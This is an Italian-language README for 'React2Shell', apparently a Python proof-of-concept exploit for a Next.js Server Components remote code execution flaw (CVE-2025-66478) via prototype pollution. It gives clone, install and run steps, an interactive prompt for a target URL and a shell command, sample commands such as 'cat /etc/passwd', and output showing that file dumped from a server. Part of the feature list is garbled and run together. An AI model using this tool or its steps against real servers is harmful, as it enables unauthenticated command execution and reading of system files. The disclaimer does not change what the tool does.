
React2Shell (CVE-2025-66478): Un Proof of Concept basato su Python per l'Esecuzione Remota di Codice (RCE) Critica nei Componenti Server di Next.js. Include una CLI interattiva, iniezione di payload personalizzati e formattazione dell'output più pulita. Solo per ricerca educativa.
Esecuzione remota di codice (RCE) su Next.js tramite inquinamento del prototipo nei Server Components
Questo repository contiene una Prova di Concetto (PoC) per CVE-2025-66478 (indicata anche come CVE-2025-55182 in alcuni contesti), una vulnerabilità critica che colpisce le applicazioni Next.js che utilizzano versioni specifiche di React Server Components (RSC).
Manipolando il processo di serializzazione degli RSC, un attaccante non autenticato può iniettare un payload malevolo tramite inquinamento del prototipo (__proto__:then). Ciò può portare all'esecuzione di comandi arbitrari sul server attraverso child_process.execSync.
Sviluppato da: ArkhamKnight47
multipart/form-data richiesto.1:E{"digest":...}).\n vs \r\n) per un output pulito su target Windows e Linux.requests# Clona il repository
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# Installa le dipendenze
pip install requests
python CVE-2025-66478.py
Ti verrà chiesto di inserire:
http://localhost:3000id, whoami, cat /etc/passwd[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND > cat /etc/passwd
[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
Questo strumento è fornito solo a scopo educativo e di ricerca sulla sicurezza.
L'autore (ArkhamKnight47) declina ogni responsabilità per l'uso improprio di questo codice. Testare questo exploit su sistemi che non possiedi o per i quali non hai esplicita autorizzazione è illegale e non etico.
Usa responsabilmente. Impara eticamente. Proteggi il tuo stack.